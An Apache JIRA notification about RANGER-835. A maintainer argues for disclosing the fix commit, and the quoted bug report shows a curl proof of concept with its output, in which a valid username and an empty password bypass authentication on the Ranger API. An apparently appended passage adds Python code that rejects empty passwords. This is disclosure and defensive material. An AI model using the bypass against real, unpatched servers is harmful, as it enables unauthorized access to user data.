[ https://issues.apache.org/jira/browse/RANGER-835?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=15141599#comment-15141599 ]

Dilli Dorai Minnal Arumugam commented on RANGER-835:
----------------------------------------------------

[~lmccay]
We are an Apache open source project.
The code is already committed, the CVE is released and the implementation details are already public.
There is no need to reverse engineer.
We do not want to disclose the commit id and patch for a commit whose code is public and whose CVE is released?
You seem to imply that not disclosing the commit id and patch for code that is out in the open with a CVE released gets us security.
In my humble opinion, I think this does not protect us from bad guys. This just hinders good guys and legitimate customers.
If there are doubts about the correctness of the implementation, the CVE should not have been released.
I made my best attempts here to do what I think is the right thing, and rest now, though I disagree with your interpretation of #15.


> Authentication bypass in Ranger API
> -----------------------------------
>
>                 Key: RANGER-835
>                 URL: https://issues.apache.org/jira/browse/RANGER-835
>             Project: Ranger
>          Issue Type: Bug
>          Components: Ranger
>    Affects Versions: 0.5.0
>            Reporter: Jim Halfpenny
>            Priority: Critical
>              Labels: authentication, security, vulnerability
>             Fix For: 0.5.1, 0.6.0
>
>
> Authentication to the Ranger API can be trivially bypassed by sending a valid 
> username along with a null password. API authentication appears to work 
> correctly, rejecting requests if the password is incorrect but allowing 
> requests where no password has been sent.
> The example below uses curl to demonstrate this issue by retrieving a list of 
> the users.
> $ curl -u admin: -v http://127.0.0.1:6080/service/xusers/users
> *   Trying 127.0.0.1...
> * Connected to 127.0.0.1 (127.0.0.1) port 6080 (#0)
> * Server auth using Basic with user 'admin'
> > HEAD /service/xusers/users HTTP/1.1
> > Host: 127.0.0.1:6080
> > Authorization: Basic YWRtaW46
> > User-Agent: curl/7.43.0
> > Accept: */*
> > 
> < HTTP/1.1 200 OK
> < Server: Apache-Coyote/1.1
> < Set-Cookie: JSESSIONID=96458E9E9A792D794D8C0D23839CFFC9; Path=/; HttpOnly
> < Content-Type: application/xml
> < Content-Length: 0
> < Date: Fri, 05 Feb 2016 11:41:16 GMT
> < 
> <?xml version="1.0" encoding="UTF-8" 
> standalone="yes"?><vxUserList><resultSize>48</resultSize><vXUsers>...
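The header in the report above, `Authorization: Basic YWRtaW46`, is just the base64 of `admin:` with nothing after the colon, which is exactly what `curl -u admin:` sends. The following Python is an added example, not Ranger's code and not from the reporter, of the server-side check that closes the gap the report describes: decode the Basic header, refuse an empty password before any backend is consulted, and only then compare against a stored hash in constant time. The user store, the stored password, `parse_basic_auth`, `authenticate` and `basic_header` are all constructed for this example.

```python
import base64
import binascii
import hashlib
import hmac
import os
from typing import Optional, Tuple

# Constructed credential store for the example (not Ranger's user store):
# username -> (salt, PBKDF2-SHA256 hash of the password).
def _hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 100_000)

_SALT = os.urandom(16)
USER_STORE = {"admin": (_SALT, _hash_password("correct-horse-battery", _SALT))}


def basic_header(username: str, password: str) -> str:
    """Build the Authorization header value a client would send."""
    token = base64.b64encode(f"{username}:{password}".encode("utf-8")).decode("ascii")
    return f"Basic {token}"


def parse_basic_auth(header: Optional[str]) -> Optional[Tuple[str, str]]:
    """Decode an HTTP Basic Authorization header into (username, password).

    Returns None when the header is absent, is not the Basic scheme, is not
    valid base64, or lacks the RFC 7617 'user-id:password' separator.
    """
    if not header:
        return None
    scheme, _, token = header.partition(" ")
    if scheme.lower() != "basic" or not token.strip():
        return None
    try:
        raw = base64.b64decode(token.strip(), validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    if ":" not in raw:
        return None
    username, _, password = raw.partition(":")
    return username, password


def authenticate(header: Optional[str], store=USER_STORE) -> bool:
    """Return True only for a known user presenting a non-empty, correct password."""
    creds = parse_basic_auth(header)
    if creds is None:
        return False
    username, password = creds
    # The check the report says was missing: an empty password is never a
    # valid credential, whatever a backend would do with it, so reject it here
    # before any lookup or bind happens.
    if not password:
        return False
    entry = store.get(username)
    if entry is None:
        # Hash anyway so unknown and known users take comparable time.
        _hash_password(password, b"\x00" * 16)
        return False
    salt, expected = entry
    return hmac.compare_digest(_hash_password(password, salt), expected)


if __name__ == "__main__":
    # The header from the report decodes to user 'admin' with an empty password
    # and must be refused; the correct credential is accepted.
    print(parse_basic_auth("Basic YWRtaW46"))                          # ('admin', '')
    print(authenticate("Basic YWRtaW46"))                               # False
    print(authenticate(basic_header("admin", "correct-horse-battery")))  # True
```

The point of doing the empty-password check in the API layer, rather than relying on the backend, is that several authentication backends treat an empty password as an unauthenticated or anonymous bind and report success; rejecting the empty string before the backend sees it makes the API's behaviour independent of that.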



--
This message was sent by Atlassian JIRA
(v6.3.4#6332)